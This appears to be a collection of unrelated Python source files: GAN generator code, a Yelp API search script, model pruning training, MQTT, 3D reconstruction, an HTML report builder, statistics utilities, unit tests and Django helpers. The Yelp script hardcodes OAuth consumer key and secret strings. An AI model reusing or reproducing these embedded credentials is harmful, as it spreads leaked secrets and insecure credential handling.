m.padding_mode = 'reflect'
return m
tnn.utils.edit_model(self, to_instance_norm)
def leaky(self) -> 'Pix2PixHDGlobalGenerator':
tnn.utils.make_leaky(self)
return self
def to_unet(self) -> 'Pix2PixHDGlobalGenerator':
self._modules.clear()
arch = self.arch
ch = int(self.arch[0])
self.input = tnn.ConvBlock(33, int(arch[0]), 7)
def _build(i, prev_ch):
ch = int(arch[i][1:])
if arch[i][0] == 'R':
transforms = tnn.CondSeq()
transforms.in_channels = prev_ch
ii = 0
while arch[i][0] == 'R':
ch = int(arch[i][1:])
transforms.add_module(f'transform_{ii}',
tnn.PreactResBlock(prev_ch, ch))
prev_ch = ch
i += 1
ii += 1
transforms.out_channels = ch
transforms.add_module('norm', nn.InstanceNorm2d(ch))
transforms.add_module('relu', nn.ReLU(True))
transforms[0].preact_skip()
return transforms
if arch[i][0] == 'd':
u = tnn.encdec.UBlock(prev_ch, ch, _build(i + 1, ch))
u.to_bilinear_sampling()
u.set_decoder_num_layers(1).set_encoder_num_layers(1)
return u
self.encdec = _build(1, ch)
self.to_rgb = tnn.ConvBlock(ch, 3, 3).remove_batchnorm()
self.to_rgb.relu = nn.Sigmoid()
def to_instance_norm(m):
if isinstance(m, nn.BatchNorm2d):
return nn.InstanceNorm2d(m.num_features, affine=True)
if isinstance(m, nn.Conv2d):
m.padding_mode = 'reflect'
return m
tnn.utils.edit_model(self, to_instance_norm)
return self
def to_equal_lr(self, leak=0.) -> 'Pix2PixHDGlobalGenerator':
tnn.utils.net_to_equal_lr(self, leak=leak)
for m in self.modules():
if isinstance(m, tnn.PreactResBlock):
pass
return self
@tu.experimental
def pix2pixhd() -> Pix2PixHDGlobalGenerator:
return Pix2PixHDGlobalGenerator(['64', 'd128', 'd256', 'd512', 'd1024'] +
['R1024'] * 10 +
['u1024', 'u512', 'u256', 'u128'])
def pix2pixhd_dev() -> Pix2PixHDGlobalGenerator:
return Pix2PixHDGlobalGenerator(['64', 'd128', 'd256', 'd512'] +
['R512'] * 10 + ['u512', 'u256', 'u128'])
@tu.experimental
def pix2pixhd_res_dev() -> Pix2PixHDGlobalGenerator:
return Pix2PixHDGlobalGenerator(['8', 'd16', 'd32', 'd64', 'd128', 'd256'] +
['R256'] * 10 +
['u256', 'u128', 'u64', 'u32', 'u16'])
class MultiScaleDiscriminator(nn.Module):
def __init__(self, base_model: nn.Module, n_scales=3):
super().__init__()
self.scales = nn.ModuleList()
self.scales.append(base_model)
for i in range(n_scales - 1):
self.scales.append(copy.deepcopy(base_model))
def forward(self, x: torch.Tensor, flatten=True) -> List[torch.Tensor]:
N = x.shape[0]
outs = []
for i in range(len(self.scales)):
scale = 2**i
out = self.scales[i](nn.functional.interpolate(
x, scale_factor=1 / scale, mode='bilinear')).view(N, -1)
outs.append(out.view(N, -1))
if flatten:
return torch.cat(outs, dim=1)
else:
return outs
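# Usage sketch (illustrative only; assumes torchelie's ConvBlock keeps spatial
# size, so a 256x256 RGB input comes back at 256x256 after 3 down / 3 up steps):
#
#   net = pix2pixhd_dev()
#   fake = net(torch.randn(1, 3, 256, 256))   # sigmoid-activated RGB output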
|
485639
|
import json
import requests
from requests_oauthlib import OAuth1
consumer_key= 'NZTJrWhij8kemtAXmfyhyA'
consumer_secret = 'JtcAesDkKuNltcKdwR7NEaUkgm8'
token = '<KEY>'
token_secret = '<KEY>'
def do_search(term='Food', location='San Francisco'):
base_url = 'https://api.yelp.com/v2/search'
term = term.replace(' ', '+')
location = location.replace(' ', '+')
url = "{base_url}?term={term}&location={location}".format(base_url=base_url,
term=term,
location=location)
auth = OAuth1(consumer_key,
consumer_secret,
token,
token_secret)
r = requests.get(url, auth=auth)
return r.json(), r.text
json_data, text_data = do_search()
python_data = json.loads(text_data)
print(json.dumps(json_data, indent=4, sort_keys=True))
for i in json_data['businesses']:
print(i["name"])
print(i["phone"])
print(i["location"]["display_address"])
print(i["location"]["city"])
|
485755
|
import keras
from utils.load_cifar import load_data
from keras.preprocessing.image import ImageDataGenerator
from models import resnet, VGGnet
from utils.schedules import onetenth_60_120_160
from utils.channel_pruning import freeze_SR_layer, set_compact_model_weights
import argparse
import os
import matplotlib
matplotlib.use('AGG')
import matplotlib.pyplot as plt
def plot_history(history, result_dir, prefix):
plt.plot(history.history['acc'], marker='.')
plt.plot(history.history['val_acc'], marker='.')
plt.title('model accuracy')
plt.xlabel('epoch')
plt.ylabel('accuracy')
plt.grid()
plt.legend(['acc', 'val_acc'], loc='lower right')
plt.savefig(os.path.join(result_dir, '{}_accuracy.png'.format(prefix)))
plt.close()
plt.plot(history.history['loss'], marker='.')
plt.plot(history.history['val_loss'], marker='.')
plt.title('model loss')
plt.xlabel('epoch')
plt.ylabel('loss')
plt.grid()
plt.legend(['loss', 'val_loss'], loc='upper right')
plt.savefig(os.path.join(result_dir, '{}_loss.png'.format(prefix)))
plt.close()
def save_history(history, result_dir, prefix):
loss = history.history['loss']
acc = history.history['acc']
val_loss = history.history['val_loss']
val_acc = history.history['val_acc']
nb_epoch = len(acc)
with open(os.path.join(result_dir, '{}_result.txt'.format(prefix)), 'w') as fp:
fp.write('epoch\tloss\tacc\tval_loss\tval_acc\n')
for i in range(nb_epoch):
fp.write('{}\t{}\t{}\t{}\t{}\n'.format(
i, loss[i], acc[i], val_loss[i], val_acc[i]))
def training():
batch_size = 64
epochs = 200
fine_tune_epochs = 50
lr = 0.1
x_train, y_train, x_test, y_test, nb_classes = load_data(args.data)
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
y_train = keras.utils.to_categorical(y_train, nb_classes)
y_test = keras.utils.to_categorical(y_test, nb_classes)
datagen = ImageDataGenerator(horizontal_flip=True,
width_shift_range=5. / 32,
height_shift_range=5. / 32)
data_iter = datagen.flow(x_train, y_train, batch_size=batch_size, shuffle=True)
if args.model == 'resnet':
model = resnet.resnet(nb_classes,
depth=args.depth,
wide_factor=args.wide_factor,
sparse_factor=args.sparse_factor)
save_name = 'resnet_{}_{}_{}'.format(args.depth, args.wide_factor, args.data)
else:
model = VGGnet.vgg(nb_classes, sparse_factor=args.sparse_factor)
save_name = 'VGGnet_{}'.format(args.data)
opt = keras.optimizers.SGD(lr=lr, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
model.summary()
history = model.fit_generator(data_iter,
steps_per_epoch=x_train.shape[0] // batch_size,
epochs=epochs,
callbacks=[onetenth_60_120_160(lr)],
validation_data=(x_test, y_test))
if not os.path.exists('./results/'):
os.mkdir('./results/')
plot_history(history, './results/', save_name)
save_history(history, './results/', save_name)
model.save_weights('./results/{}_weights.h5'.format(save_name))
freeze_SR_layer(model, args.prune_rate)
# todo: a little change
opt = keras.optimizers.SGD(lr=0.0001, momentum=0.9, nesterov=True)
model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
    model.fit_generator(data_iter,
                        steps_per_epoch=x_train.shape[0] // batch_size,
                        epochs=fine_tune_epochs,
                        validation_data=(x_test, y_test))
    model.save_weights('./results/{}_{}_weights.h5'.format(save_name, 'fine_tuned'))
# create compact model
if args.model == 'resnet':
        compact_model = resnet.resnet(nb_classes,
                                      depth=args.depth,
                                      wide_factor=args.wide_factor,
                                      sparse_factor=args.sparse_factor, prune_rate=args.prune_rate)
    else:
        compact_model = VGGnet.vgg(nb_classes, sparse_factor=args.sparse_factor, prune_rate=args.prune_rate)
compact_model.summary()
set_compact_model_weights(model, compact_model)
opt = keras.optimizers.SGD(lr=0.0001, momentum=0.9, nesterov=True)
compact_model.compile(loss='categorical_crossentropy',
optimizer=opt,
metrics=['accuracy'])
score = compact_model.evaluate(x_test, y_test, verbose=0)
print('loss: {}'.format(score[0]))
print('acc: {}'.format(score[1]))
compact_model.save_weights('./results/{}_{}_weights.h5'.format(save_name, 'channel_pruned'))
if __name__ == '__main__':
parse = argparse.ArgumentParser()
parse.add_argument('--data', type=str, default='c10', help='Supports c10 (CIFAR-10) and c100 (CIFAR-100)')
parse.add_argument('--model', type=str, default='vgg')
parse.add_argument('--depth', type=int, default=40)
parse.add_argument('--growth-rate', type=int, default=12)
parse.add_argument('--wide-factor', type=int, default=1)
    parse.add_argument('--sparse-factor', type=float, default=1e-5)
    parse.add_argument('--prune-rate', type=float, default=0.75)
args = parse.parse_args()
if args.data not in ['c10', 'c100']:
raise Exception('args.data must be c10 or c100!')
training()
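# Invocation sketch (the script name is hypothetical; the flags are the ones
# defined by the argparse block above):
#
#   python train_pruning.py --model vgg --data c10 --sparse-factor 1e-5 --prune-rate 0.75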
|
485762
|
import mosquitto
import os
client = mosquitto.Mosquitto('Subscriber-%s' % os.getpid())
def on_connect(mosq, obj, rc):
if rc == 0:
print('Connected')
else:
print('Connection Error')
client.on_connect = on_connect
def on_message(mosq, obj, msg):
print('Topic: %s' % msg.topic)
print('QoS: %s' % msg.qos)
print('Retain: %s' % msg.retain)
print('Payload: %s' % msg.payload)
client.unsubscribe('mqtt/example')
client.on_message = on_message
def on_unsubscribe(mosq, obj, mid):
print("Unsubscribe with mid %s received." % mid)
client.disconnect()
client.on_unsubscribe = on_unsubscribe
client.connect("127.0.0.1")
client.subscribe("mqtt/example", 0)
while client.loop(timeout=1) == 0:
pass
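# To exercise this subscriber, publish one message to the same broker/topic with
# the standard mosquitto client tools, e.g.:
#
#   mosquitto_pub -h 127.0.0.1 -t mqtt/example -m "hello"
#
# on_message prints the message and unsubscribes, on_unsubscribe disconnects,
# and the loop above then terminates.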
|
485834
|
import os
import time
import argparse
import numpy as np
import torch
import open3d as o3d
from fusion import TSDFVolumeTorch
from dataset.tum_rgbd import TUMDataset
from tracker import ICPTracker
from utils import load_config, get_volume_setting, get_time
vis_param = argparse.Namespace()
vis_param.frame_id = 0
vis_param.current_mesh = None
vis_param.current_camera = None
vis_param.curr_pose = None
def refresh(vis):
if vis:
# This spares slots for meshing thread to emit commands.
time.sleep(0.01)
if vis_param.frame_id == vis_param.n_frames:
return False
sample = vis_param.dataset[vis_param.frame_id]
color0, depth0, pose_gt, K = sample # use live image as template image (0)
# depth0[depth0 <= 0.5] = 0.
if vis_param.frame_id == 0:
vis_param.curr_pose = pose_gt
else:
# render depth image (1) from tsdf volume
depth1, color1, vertex01, normal1, mask1 = \
vis_param.map.render_model(vis_param.curr_pose, K, vis_param.H, vis_param.W,
                                           near=vis_param.args.near, far=vis_param.args.far, n_samples=vis_param.args.n_steps)
T10 = vis_param.tracker(depth0, depth1, K) # transform from 0 to 1
vis_param.curr_pose = vis_param.curr_pose @ T10
# update view-point
if vis_param.args.follow_camera:
follow_camera(vis, vis_param.curr_pose.cpu().numpy())
# fusion
vis_param.map.integrate(depth0, K, vis_param.curr_pose, obs_weight=1., color_img=color0)
# update mesh
mesh = vis_param.map.to_o3d_mesh()
if vis_param.current_mesh is not None:
vis.remove_geometry(vis_param.current_mesh, reset_bounding_box=False)
vis.add_geometry(mesh, reset_bounding_box=False)
vis_param.current_mesh = mesh
# update camera
camera = draw_camera(vis_param.curr_pose.cpu().numpy())
if vis_param.current_camera is not None:
vis.remove_geometry(vis_param.current_camera, reset_bounding_box=False)
vis.add_geometry(camera, reset_bounding_box=False)
vis_param.current_camera = camera
vis_param.frame_id += 1
return True
def draw_camera(c2w, cam_width=0.2, cam_height=0.15, f=0.1):
points = [[0, 0, 0], [-cam_width, -cam_height, f], [cam_width, -cam_height, f],
[cam_width, cam_height, f], [-cam_width, cam_height, f]]
lines = [[0, 1], [0, 2], [0, 3], [0, 4], [1, 2], [2, 3], [3, 4], [4, 1]]
colors = [[1, 0, 1] for i in range(len(lines))]
line_set = o3d.geometry.LineSet()
line_set.points = o3d.utility.Vector3dVector(points)
line_set.lines = o3d.utility.Vector2iVector(lines)
line_set.colors = o3d.utility.Vector3dVector(colors)
line_set.transform(c2w)
return line_set
def follow_camera(vis, c2w, z_offset=-2):
"""
:param vis: visualizer handle
    :param c2w: camera-to-world transform Twc (camera pose)
:param z_offset: offset along z-direction of eye wrt camera
:return:
"""
e2c = np.eye(4)
e2c[2, 3] = z_offset
e2w = c2w @ e2c
set_view(vis, np.linalg.inv(e2w))
def set_view(vis, w2e=np.eye(4)):
"""
:param vis: visualizer handle
:param w2e: world-to-eye transform
:return:
"""
vis_ctl = vis.get_view_control()
cam = vis_ctl.convert_to_pinhole_camera_parameters()
# world to eye w2e
cam.extrinsic = w2e
vis_ctl.convert_from_pinhole_camera_parameters(cam)
def get_view(vis):
vis_ctl = vis.get_view_control()
cam = vis_ctl.convert_to_pinhole_camera_parameters()
print(cam.extrinsic)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--config", type=str, default="configs/fr1_desk.yaml", help="Path to config file.")
parser.add_argument("--follow_camera", action="store_true", help="Make view-point follow the camera motion")
args = load_config(parser.parse_args())
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
# device = torch.device("cpu")
dataset = TUMDataset(os.path.join(args.data_root), device, near=args.near, far=args.far, img_scale=0.25)
vol_dims, vol_origin, voxel_size = get_volume_setting(args)
vis_param.args = args
vis_param.dataset = dataset
vis_param.map = TSDFVolumeTorch(vol_dims, vol_origin, voxel_size, device, margin=3, fuse_color=True)
vis_param.tracker = ICPTracker(args, device)
vis_param.n_frames = len(dataset)
vis_param.H = dataset.H
vis_param.W = dataset.W
# visualize
vis = o3d.visualization.VisualizerWithKeyCallback()
vis.create_window(width=1280, height=960)
# vis.get_view_control().unset_constant_z_near()
# vis.get_view_control().unset_constant_z_far()
vis.get_render_option().mesh_show_back_face = True
vis.register_animation_callback(callback_func=refresh)
coord_axes = o3d.geometry.TriangleMesh.create_coordinate_frame()
vis.add_geometry(coord_axes)
vis.remove_geometry(coord_axes, reset_bounding_box=False)
# set initial view-point
c2w0 = dataset[0][2]
follow_camera(vis, c2w0.cpu().numpy())
# start reconstruction and visualization
vis.run()
vis.destroy_window()
|
485846
|
import dominate
from dominate.tags import *
import os
import numpy as np
import ntpath
import time
import glob
import sys
import pdb
# define HTML class
class HTML:
    def __init__(self, title, refresh=0):
        self.title = title
        self.doc = dominate.document(title=title)
        if refresh > 0:
            with self.doc.head:
                meta(http_equiv="refresh", content=str(refresh))
def add_header(self, str):
with self.doc:
h3(str)
def add_table(self, border=1):
self.t = table(border=border, style="table-layout: fixed;")
self.doc.add(self.t)
def add_images(self, ims, txts, width=400):
self.add_table()
with self.t:
with tr():
for im, txt in zip(ims, txts):
with td(style="word-wrap: break-word;", halign="center", valign="top"):
with p():
with a(href=im):
img(style="width:%dpx" % width, src=im)
br()
p(txt)
def save(self):
html_file = '%s.html' % self.title
f = open(html_file, 'wt')
f.write(self.doc.render())
f.close()
def main():
# name = 'disentangled_shuffle_resnet_9blocks_sigmoid_A100_TV1_lr0.0002'
name = sys.argv[1]
root = '/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/'
web_name = 'Dehaze_'+name
suffix = ['_Hazy', '_dcp_radiance-refinedt', '_DehazeNet', '_fake_B', '_Haze-free', '_Haze-free-depth', '_real_B']
# folder = ['/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/',
# 'DCP/'+name+'/',
# 'DehazeNet/'+name+'/',
# '/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/',
# '/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/']
folder = ['/static/'+name+'/images/',
'/static/DCP/',
'/static/DehazeNet/',
'/static/cyclegan/',
'/static/'+name+'/images/',
'/static/'+name+'/images/',
'/static/'+name+'/images/']
assert len(suffix) == len(folder)
img_names = glob.glob(root+'/*_Hazy_Hazy.png')
max_num = 100
win_size = 256
# create website
webpage = HTML(web_name)
for i, img_name in enumerate(img_names):
if i >= max_num:
break
img_name = os.path.basename(img_name)
img_path = []
for j in range(len(suffix)):
img_path.append(os.path.join(folder[j], img_name.replace('_Hazy.png', suffix[j]+'.png')))
webpage.add_header(img_name)
webpage.add_images(img_path, suffix, win_size)
webpage.save()
##################### Page 2####################
web_name = 'Transmission_'+name
suffix = ['_Hazy', '_dcp_refinedt', '_transmition', '_Estimate_depth', '_real_depth']
# folder = ['/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/',
# '/home/xyang/Downloads/GAN/DCP/'+name+'/',
# '/home/xyang/Downloads/GAN/DehazeNet/'+name+'/',
# '/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/',
# '/home/xyang/UTS/Data/Haze/D-HAZY/NYU/results/'+name+'/test_latest/images/']
folder = ['/static/'+name+'/images/',
'/static/DCP/',
'/static/DehazeNet/',
'/static/'+name+'/images/',
'/static/'+name+'/images/']
assert len(suffix) == len(folder)
img_names = glob.glob(root+'/*_Hazy_Hazy.png')
max_num = 100
win_size = 256
# create website
webpage = HTML(web_name)
for i, img_name in enumerate(img_names):
if i >= max_num:
break
img_name = os.path.basename(img_name)
img_path = []
for j in range(len(suffix)):
img_path.append(os.path.join(folder[j], img_name.replace('_Hazy.png', suffix[j]+'.png')))
webpage.add_header(img_name)
webpage.add_images(img_path, suffix, win_size)
webpage.save()
if __name__ == '__main__':
main()
|
485880
|
import json
from api_client import parser, client, content, permission
from util import pretty_print, read_json_file
parser.add_argument('path', type=str, help="Path to content")
parser.add_argument('action', type=str, help="Get, add, or remove permissions",
choices=['get', 'add', 'remove'])
parser.add_argument('--data_file', '-d', type=str,
help="File to read permission from when adding or removing permissions")
args = parser.parse_args()
api_client = client.ApiClient(args.access_id, args.access_key, args.endpoint)
content_api = content.ContentManagementApi(api_client)
permissions_api = permission.ContentPermissionApi(api_client)
content_id = content_api.find_id_by_path(args.path)
if args.action == 'get':
permissions = permissions_api.get_permissions(content_id)
pretty_print(permissions['explicitPermissions'])
else:
permissions = read_json_file(args.data_file)
body = {
'contentPermissionAssignments': permissions,
'notifyRecipients': False,
'notificationMessage': ""
}
if args.action == 'add':
permissions_api.add_permissions(content_id, body)
elif args.action == 'remove':
permissions_api.remove_permissions(content_id, body)
|
485904
|
from typing import Tuple, Dict
import numpy as np
import tensorflow as tf
from tensorflow import Tensor
from decompose.distributions.algorithms import Algorithms
class LaplaceAlgorithms(Algorithms):
@classmethod
def sample(cls, parameters: Dict[str, Tensor], nSamples: Tensor) -> Tensor:
mu, beta = parameters["mu"], parameters["beta"]
norm = tf.distributions.Laplace(loc=mu, scale=beta)
r = norm.sample(sample_shape=(nSamples,))
print("r in sample", r)
return(r)
@classmethod
def mode(cls, parameters: Dict[str, Tensor]) -> Tensor:
mu = parameters["mu"]
return(mu)
@classmethod
def pdf(cls, parameters: Dict[str, Tensor], data: Tensor) -> Tensor:
mu, beta = parameters["mu"], parameters["beta"]
norm = tf.distributions.Laplace(loc=mu, scale=beta)
pdf = norm.prob(value=data)
return(pdf)
@classmethod
def fit(cls, parameters: Dict[str, Tensor],
data: tf.Tensor) -> Dict[str, Tensor]:
        # Maximum-likelihood update for a Laplace distribution: mu is the
        # column-wise median, beta the mean absolute deviation from it.
        M = data.get_shape().as_list()[0]
mu = tf.contrib.nn.nth_element(tf.transpose(data), M//2)
beta = tf.reduce_mean(tf.abs(data-mu), axis=0)
updatedParameters = {"mu": mu, "beta": beta}
return(updatedParameters)
@classmethod
def llh(cls, parameters: Dict[str, Tensor], data: tf.Tensor) -> Tensor:
mu, beta = parameters["mu"], parameters["beta"]
norm = tf.distributions.Laplace(loc=mu, scale=beta)
llh = norm.log_prob(value=data)
return(llh)
@classmethod
def fitLatents(cls, parameters: Dict[str, Tensor],
data: Tensor) -> Dict[str, Tensor]:
return({})
|
486046
|
import unittest
import numpy as np
import PySeismoSoil.helper_generic as hlp
import os
from os.path import join as _join
f_dir = _join(os.path.dirname(os.path.realpath(__file__)), 'files')
class Test_Helper_Generic(unittest.TestCase):
def test_is_int(self):
self.assertTrue(hlp.is_int(3))
self.assertTrue(hlp.is_int(np.array([3])[0]))
self.assertTrue(hlp.is_int(3.0))
self.assertTrue(hlp.is_int(np.array([3.0])[0]))
self.assertFalse(hlp.is_int(3.1))
self.assertFalse(hlp.is_int(np.array([3.1])[0]))
self.assertFalse(hlp.is_int(None))
self.assertFalse(hlp.is_int(np.array([])))
self.assertFalse(hlp.is_int(np.array([3])))
def test_read_two_column_stuff(self):
# Load from file
data, dt = hlp.read_two_column_stuff(_join(f_dir, 'two_column_data_example.txt'))
benchmark = np.array(
[[.1, .2, .3, .4, .5, .6, .7, .8, .9, 1.0, 1.1, 1.2, 1.3, 1.4, 1.5],
[1, 2, 3, 4, 5, 2, 3, 4, 5, 6, 3, 4, 5, 6, 7]]
).T
self.assertTrue(np.allclose(data, benchmark))
self.assertAlmostEqual(dt, benchmark[1, 0] - benchmark[0, 0])
# Load from 1D numpy array
data_1col = np.array([1, 2, 3, 4, 5, 2, 3, 4, 5, 6, 3, 4, 5, 6, 7])
dt = 0.1
        data_, dt_ = hlp.read_two_column_stuff(data_1col, dt)
self.assertTrue(np.allclose(data_1col, data_[:, 1]))
self.assertAlmostEqual(dt, dt_)
# Load from 2D numpy array
data__, dt__ = hlp.read_two_column_stuff(
benchmark, benchmark[1, 0] - benchmark[0, 0],
)
self.assertTrue(np.allclose(data__, benchmark))
self.assertAlmostEqual(dt__, benchmark[1, 0] - benchmark[0, 0])
def test_check_two_column_format(self):
with self.assertRaisesRegex(TypeError, '1.5 should be a numpy array.'):
hlp.check_two_column_format(1.5, '1.5')
with self.assertRaisesRegex(TypeError, '_a_ should be a 2D numpy array.'):
hlp.check_two_column_format(np.array([1, 2, 3]), '_a_')
with self.assertRaisesRegex(TypeError, '_b_ should have two columns.'):
hlp.check_two_column_format(np.ones((2, 3)), '_b_')
def test_find_closest_index(self):
array = [1, 2, 3]
value = 3
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array.'):
hlp.find_closest_index(array, value)
array = np.array([1])
value = 5
self.assertTrue(np.allclose(hlp.find_closest_index(array, value), [0, 1]))
array = np.array([4, 3, 2, 1, 5, 7, 9])
value = 2.2
self.assertTrue(np.allclose(hlp.find_closest_index(array, value), [2, 2]))
value = -100
self.assertTrue(np.allclose(hlp.find_closest_index(array, value), [3, 1]))
value = 100
self.assertTrue(np.allclose(hlp.find_closest_index(array, value), [6, 9]))
def test_mean_absolute_error(self):
y_true = np.array([1, 2, 3, 4, 5])
y_pred = np.array([1.32, 2.12, 2.87, 3.95, 5.74])
self.assertAlmostEqual(hlp.mean_absolute_error(y_true, y_pred), 0.272)
def test_check_numbers_valid(self):
self.assertEqual(hlp.check_numbers_valid(np.array([1, 2, 3])), 0)
self.assertEqual(hlp.check_numbers_valid(np.array(['a', 'b'])), -1)
self.assertEqual(hlp.check_numbers_valid(np.array([1, 2, np.nan])), -2)
self.assertEqual(hlp.check_numbers_valid(np.array([1, 2, -1])), -3)
def test_assert_1D_numpy_array(self):
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array.'):
hlp.assert_1D_numpy_array([1, 2, 3, 4])
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array.'):
hlp.assert_1D_numpy_array(np.array([[1, 2, 3, 4]]))
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array.'):
hlp.assert_1D_numpy_array(np.array([[1, 2], [3, 4]]))
def test_assert_array_length(self):
# Case #1: not an array
thing = None
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array'):
hlp.assert_array_length(thing, name='`thing`', length=None)
# Case #2: 1D numpy array, length check successful
thing = np.array([1, 2, 3])
hlp.assert_array_length(thing, length=3) # running without exception
# Case #3: 1D numpy array, length check failed
thing = np.array([1, 2, 3])
with self.assertRaisesRegex(ValueError, 'have length 4, but not 3'):
hlp.assert_array_length(thing, length=4)
def test_extend_scalar(self):
# Case #1: not a single number
with self.assertRaisesRegex(TypeError, 'must be a float, int'):
hlp.extend_scalar(np.ones(3), 2)
# Case #2: `length` is something strange
self.assertTrue(np.allclose(hlp.extend_scalar(2.5, None), np.array(2.5)))
# Case #3: `length` is an integer
self.assertTrue(np.allclose(
hlp.extend_scalar(2.5, 3), np.array([2.5, 2.5, 2.5]),
))
# Case #4: `length` is not an integer
with self.assertRaisesRegex(TypeError, "cannot be interpreted as an integer"):
hlp.extend_scalar(2.5, 3.5)
def test_check_length_or_extend_to_array(self):
# Case #1: a 2D numpy array -- error
a = np.array([[1, 2], [3, 4]])
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array'):
hlp.check_length_or_extend_to_array(a, 3)
# Case #2: a 1D numpy array with correct length
hlp.check_length_or_extend_to_array(np.array([1, 2, 3]), 3)
# Case #3: a 1D numpy array with incorrect length
with self.assertRaisesRegex(ValueError, 'have length 6, but not 3'):
hlp.check_length_or_extend_to_array(np.array([1, 2, 3]), 6)
# Case #4: a single value
array_bench = np.array([3.4, 3.4, 3.4, 3.4, 3.4])
array = hlp.check_length_or_extend_to_array(3.4, 5)
self.assertTrue(np.allclose(array, array_bench))
# Case #5: other data types
with self.assertRaisesRegex(TypeError, 'must be a 1D numpy array'):
hlp.check_length_or_extend_to_array(None, 3)
def test_extract_from_curve_format(self):
data = np.genfromtxt(_join(f_dir, 'curve_FKSH14.txt'))[:, :8]
GGmax, damping = hlp.extract_from_curve_format(data)
strain = [0.0001, 0.0003, 0.001, 0.003, 0.01, 0.03, 0.1, 0.3, 1, 3]
GGmax_1 = [
0.99038, 0.97403, 0.92539, 0.8188, 0.59912, 0.35256,
0.15261, 0.061578, 0.021241, 0.0078452,
]
GGmax_2 = [
0.99452, 0.98511, 0.95629, 0.88852, 0.72498, 0.48992,
0.24108, 0.10373, 0.036868, 0.013755,
]
damping_1 = [
1.6683, 1.8386, 2.4095, 3.8574, 7.4976, 12.686, 18.102,
21.005, 21.783, 21.052,
]
damping_2 = [
0.99457, 1.0872, 1.4039, 2.2497, 4.6738, 9.0012, 14.898,
19.02, 21.021, 20.947,
]
GGmax_bench = [
np.column_stack((strain, GGmax_1)),
np.column_stack((strain, GGmax_2)),
]
damping_bench = [
np.column_stack((strain, damping_1)),
np.column_stack((strain, damping_2)),
]
self.assertTrue(np.allclose(GGmax, GGmax_bench))
self.assertTrue(np.allclose(damping, damping_bench))
def test_extract_from_param_format(self):
data = np.genfromtxt(_join(f_dir, 'HH_X_FKSH14.txt'))
param = hlp.extract_from_param_format(data)
param_bench = [
np.array([0.010161, 1, 0.10468, 39.317, 0.630114, 18.7975, 149.535, 29.053, 1]),
np.array([0.027916, 1.01507, 0.0851825, 23.468, 0.638322, 5.84163, 183.507, 29.7071, 1]),
np.array([0.0479335, 1.00849, 0.276801, 35.9504, 0.643012, 5.04279, 193.483, 54.8234, 1]),
np.array([0.0516179, 1.0215, 0.153973, 21.8676, 0.654707, 1.44752, 179.24, 22.4495, 1]),
np.array([0.0340815, 1.02711, 0.202054, 25.2326, 0.667001, 3.97622, 195.136, 34.601, 1]),
]
self.assertTrue(np.allclose(param, param_bench))
def test_merge_curve_matrices(self):
m1 = np.array(
[[1, 2, 3],
[-1, -2, -3],
[1, 2, 3],
[-2, -3, -4],
[1, 2, 3],
[-3, -4, -5],
[1, 2, 3],
[-4, -5, -6]]
).T
m2 = np.array(
[[1, 2, 3],
[10, 20, 30],
[1, 2, 3],
[20, 30, 40],
[1, 2, 3],
[30, 40, 50],
[1, 2, 3],
[40, 50, 60]]
).T
benchmark = np.array(
[[1, 2, 3],
[-1, -2, -3],
[1, 2, 3],
[20, 30, 40],
[1, 2, 3],
[-3, -4, -5],
[1, 2, 3],
[40, 50, 60]]
).T
result = hlp.merge_curve_matrices(m1, m2)
self.assertTrue(np.allclose(result, benchmark))
if __name__ == '__main__':
SUITE = unittest.TestLoader().loadTestsFromTestCase(Test_Helper_Generic)
unittest.TextTestRunner(verbosity=2).run(SUITE)
|
486058
|
from pydantic import BaseModel
from .mixin import YamlModelMixin
_pre_doc = """`pydantic.BaseModel` class with built-in YAML support.
You can alternatively inherit from this to implement your model:
`(pydantic_yaml.YamlModelMixin, pydantic.BaseModel)`
See Also
--------
pydantic-yaml: https://github.com/NowanIlfideme/pydantic-yaml
pydantic: https://pydantic-docs.helpmanual.io/
pyyaml: https://pyyaml.org/
ruamel.yaml: https://yaml.readthedocs.io/en/latest/index.html
"""
class YamlModel(YamlModelMixin, BaseModel):
__doc__ = _pre_doc + BaseModel.__doc__
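# Minimal usage sketch (the field names are illustrative, not part of the library):
#
#   class MyConfig(YamlModel):
#       name: str
#       retries: int = 3
#
#   cfg = MyConfig(name="demo")   # behaves like a regular pydantic model,
#                                 # with YAML (de)serialization mixed in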
|
486071
|
import bleach
from markdown import markdown
from typing import Any, List, Iterable
from django.contrib.auth.models import Permission
from django.utils.text import SafeText
def get_permissions_from_ns_codenames(ns_codenames):
'''
Returns a list of Permission objects for the specified namespaced codenames
'''
splitnames = [ns_codename.split('.') for ns_codename in ns_codenames]
return [
Permission.objects.get(codename=codename,
content_type__app_label=app_label)
for app_label, codename in splitnames
]
def unbroken_hyphenize(text: str) -> str:
'''
Replace all hyphens with non-breaking hyphens.
    >>> unbroken_hyphenize('874-1, 874-2')
    '874\u20111, 874\u20112'
'''
return text.replace('-', '\u2011')
def backtickify(items: Iterable[Any]) -> List[str]:
'''
Wrap all list items in backticks, e.g.:
>>> backtickify(['a', 'b'])
['`a`', '`b`']
'''
return list(map(lambda s: f"`{s}`", items))
def humanlist(items: Iterable[str], word: str='and') -> str:
'''
Convert the given list to a comma-separated human-readable
string, separating the final item with the given word.
As per the 18F Content Guide, we use the Oxford comma.
Examples:
>>> humanlist(['a', 'b', 'c'])
'a, b, and c'
>>> humanlist(['a', 'b', 'c'], 'or')
'a, b, or c'
>>> humanlist(['a'])
'a'
'''
itemlist = list(items)
